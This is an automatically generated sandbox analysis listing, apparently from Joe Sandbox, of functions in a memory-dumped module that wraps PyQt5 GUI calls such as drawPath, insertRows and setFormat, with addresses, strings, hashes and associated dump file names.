Instruction Fuzzy Hash: 6E1104B6A08F56C1EB20CF64E8886A933A8FB48B84F9141B6CA9C43320DF7DD559C740

Function 00007FFB9A2E7950 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

?replace@?$QVector@VQPoint@@@@QEAAXHAEBVQPoint@@@Z.QT5CORE ref: 00007FFB9A2E79C2

Strings

QPolygon, xrefs: 00007FFB9A2E79FB
replace, xrefs: 00007FFB9A2E79F4
replace(self, i: int, value: QPoint), xrefs: 00007FFB9A2E79E5
BiJ9, xrefs: 00007FFB9A2E7976

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?replace@?$Point@@@Point@@@@Vector@
String ID: BiJ9$QPolygon$replace$replace(self, i: int, value: QPoint)
API String ID: 4224568828-2626586282
Opcode ID: 0bb4fb0cd837303f7185ca0a649baf408bee75285c7a214f355722fd5b29f52d
Instruction ID: 52266e6b1fc8020e708efb027701686127974010553ce1e611b1743fa6b376c4
Opcode Fuzzy Hash: 0bb4fb0cd837303f7185ca0a649baf408bee75285c7a214f355722fd5b29f52d
Instruction Fuzzy Hash: D01119B5A08F46C1EB20CF20E8886A933B8FB49784F9141B6CA9C43320DF7DD959C740

Function 00007FFB9A2E9980 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

?objectForFormat@QTextDocument@@QEBAPEAVQTextObject@@AEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A2E99E3

Strings

BJ9, xrefs: 00007FFB9A2E99A6
QTextDocument, xrefs: 00007FFB9A2E9A22
objectForFormat(self, a0: QTextFormat) -> Optional[QTextObject], xrefs: 00007FFB9A2E9A0F
objectForFormat, xrefs: 00007FFB9A2E9A1B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?objectDocument@@Format@Format@@@Object@@
String ID: BJ9$QTextDocument$objectForFormat$objectForFormat(self, a0: QTextFormat) -> Optional[QTextObject]
API String ID: 1083227716-3375662907
Opcode ID: e24c0b50383136869169771f1028a31cdc27df598ff3f87bbc9423cb8c00f568
Instruction ID: ac7e97334bb781e51c1ef8947a1e1613cd0c7cd4cb68ce17dc66eeed6024a8b7
Opcode Fuzzy Hash: e24c0b50383136869169771f1028a31cdc27df598ff3f87bbc9423cb8c00f568
Instruction Fuzzy Hash: 85111CB5B18E46C1EB10DF75E8886A933A9FB59B84FA180B6CA5C43320DF3DD559C740

Function 00007FFB9A353ED0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON

Download Yara Rule

APIs

?removeRows@QStandardItem@@QEAAXHH@Z.QT5GUI ref: 00007FFB9A353F34

Strings

removeRows(self, row: int, count: int), xrefs: 00007FFB9A353F57
QStandardItem, xrefs: 00007FFB9A353F6A
Bii, xrefs: 00007FFB9A353EF7
removeRows, xrefs: 00007FFB9A353F63

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?removeItem@@Rows@Standard
String ID: Bii$QStandardItem$removeRows$removeRows(self, row: int, count: int)
API String ID: 3935922224-2605227661
Opcode ID: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
Instruction ID: 840f4d53224befc561f1e3ff1e6869c8757de18764f99cae990ac8efdbfdba5a
Opcode Fuzzy Hash: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
Instruction Fuzzy Hash: 8111D4B6B18F56C1EB109B25E8886A933A8FB48B84FA14176CA5D03320DF39D94AC740

Function 00007FFB9A30DBA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON

Download Yara Rule

APIs

?insertRows@QTextTable@@QEAAXHH@Z.QT5GUI ref: 00007FFB9A30DC04

Strings

insertRows(self, pos: int, num: int), xrefs: 00007FFB9A30DC27
insertRows, xrefs: 00007FFB9A30DC33
QTextTable, xrefs: 00007FFB9A30DC3A
Bii, xrefs: 00007FFB9A30DBC7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?insertRows@Table@@Text
String ID: Bii$QTextTable$insertRows$insertRows(self, pos: int, num: int)
API String ID: 1677532092-1991279250
Opcode ID: de523cb18ab00669ce1c2bcc5915b3549b91accafaee1164ee70f329b86bfd52
Instruction ID: 970dc458741b5501317faae53a760dcb3d99ac2150480a63e4551730340130ab
Opcode Fuzzy Hash: de523cb18ab00669ce1c2bcc5915b3549b91accafaee1164ee70f329b86bfd52
Instruction Fuzzy Hash: C911E3B6B18F56C1EB10DF25E8886A933A8FB49B84FA14172CA5D03320DF79D95AC740

Function 00007FFB9A34BEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?elementCount@QPainterPath@@QEBAHXZ.QT5GUI ref: 00007FFB9A34BEFA
PyBool_FromLong.PYTHON3 ref: 00007FFB9A34BF07

Strings

isEmpty(self) -> bool, xrefs: 00007FFB9A34BF1A
isEmpty, xrefs: 00007FFB9A34BF26
QTextFormat, xrefs: 00007FFB9A34BF2D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?elementBool_Count@FromLongPainterPath@@
String ID: QTextFormat$isEmpty$isEmpty(self) -> bool
API String ID: 3302664181-1918454510
Opcode ID: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
Instruction ID: 4f21527d9b14fdbca6d2cb712b27e7cb38db62a2af36b5a60fda729045fdd143
Opcode Fuzzy Hash: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
Instruction Fuzzy Hash: 08015AB6B09B4681EB108F75E8884A933ACFF84B94B9140B6CE5D43360DF7CE599C380

Function 00007FFB9A33BB40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?drawPath@QPainter@@QEAAXAEBVQPainterPath@@@Z.QT5GUI ref: 00007FFB9A33BBA3

Strings

BJ9, xrefs: 00007FFB9A33BB66
drawPath(self, path: QPainterPath), xrefs: 00007FFB9A33BBC6
QPainter, xrefs: 00007FFB9A33BBD9
drawPath, xrefs: 00007FFB9A33BBD2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?drawPainterPainter@@Path@Path@@@
String ID: BJ9$QPainter$drawPath$drawPath(self, path: QPainterPath)
API String ID: 397086431-3604277530
Opcode ID: c6acc149c480db940c89464465441bdec1ea30872392117e81307073b056f59b
Instruction ID: 5aa013d5986b3d6e9a31d1ac968323377bcce4be7c98d797011807e20cb75e7d
Opcode Fuzzy Hash: c6acc149c480db940c89464465441bdec1ea30872392117e81307073b056f59b
Instruction Fuzzy Hash: CF11ECB5A18F46C1EB50DF25E8886A933B9FB48B94FA140B6CA5D03320DF7DD559C740

Function 00007FFB9A33DC80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setTextOption@QStaticText@@QEAAXAEBVQTextOption@@@Z.QT5GUI ref: 00007FFB9A33DCE3

Strings

BJ9, xrefs: 00007FFB9A33DCA6
setTextOption(self, textOption: QTextOption), xrefs: 00007FFB9A33DD06
QStaticText, xrefs: 00007FFB9A33DD19
setTextOption, xrefs: 00007FFB9A33DD12

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?setOption@Option@@@StaticText@@
String ID: BJ9$QStaticText$setTextOption$setTextOption(self, textOption: QTextOption)
API String ID: 1549580214-3228975014
Opcode ID: 3182e812db8d97e37d31260606e33a90866172172359f6c3c5c710757014f941
Instruction ID: 20fdaac39a0ea3ac0c5e59a7843057aac24e3e0c26ba5e901441cb7f5003b8fb
Opcode Fuzzy Hash: 3182e812db8d97e37d31260606e33a90866172172359f6c3c5c710757014f941
Instruction Fuzzy Hash: 831106B5A18F4AC1EB10DF25E8892A933A8FB49B84FA140B6CA5C03320DF3DD549C740

Function 00007FFB9A345920 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?type@QTextFormat@@QEBAHXZ.QT5GUI ref: 00007FFB9A34596A
PyBool_FromLong.PYTHON3 ref: 00007FFB9A345978

Strings

isBlockFormat(self) -> bool, xrefs: 00007FFB9A34598B
QTextFormat, xrefs: 00007FFB9A34599E
isBlockFormat, xrefs: 00007FFB9A345997

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?type@Bool_Format@@FromLongText
String ID: QTextFormat$isBlockFormat$isBlockFormat(self) -> bool
API String ID: 1807932774-2730531752
Opcode ID: 029e39fe9a6f628f44f8ff7c067c5e6c971b584ffef2ac4b987f83ed0189ee65
Instruction ID: ee7e074f6c645979258bb279e03d5d511269ec802955011af8a7a3a30bca5ff9
Opcode Fuzzy Hash: 029e39fe9a6f628f44f8ff7c067c5e6c971b584ffef2ac4b987f83ed0189ee65
Instruction Fuzzy Hash: 990148B6B08A4681EB109F71E8884A873A8FB54795B9540B6CE5D43360DF7DDA99C380

Function 00007FFB9A35B9F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?setFormat@QTextObject@@IEAAXAEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A35BA53

Strings

BJ9, xrefs: 00007FFB9A35BA16
QTextObject, xrefs: 00007FFB9A35BA89
setFormat, xrefs: 00007FFB9A35BA82
setFormat(self, format: QTextFormat), xrefs: 00007FFB9A35BA76

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?setFormat@Format@@@Object@@
String ID: BJ9$QTextObject$setFormat$setFormat(self, format: QTextFormat)
API String ID: 760775155-52768488
Opcode ID: 7443c91ac825b71c42e99f05e2dd46f32069fdb6c8a025c23fb5e6b3568a6c3e
Instruction ID: 9d97837edff5938e86527712aabdbfe3e28bf592070c08ca61244f435df625d6
Opcode Fuzzy Hash: 7443c91ac825b71c42e99f05e2dd46f32069fdb6c8a025c23fb5e6b3568a6c3e
Instruction Fuzzy Hash: 7A1118B5A18F46C1EB10DF25E8882A933B9FB48B84F9140B2CA4D03320DF3DD95AC740

Function 00007FFB9A34FAB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QRegion@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFB9A34FB0C

Strings

BJ9, xrefs: 00007FFB9A34FADE
swap(self, other: QPainterPath), xrefs: 00007FFB9A34FB2F
QPainterPath, xrefs: 00007FFB9A34FB42
swap, xrefs: 00007FFB9A34FB3B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
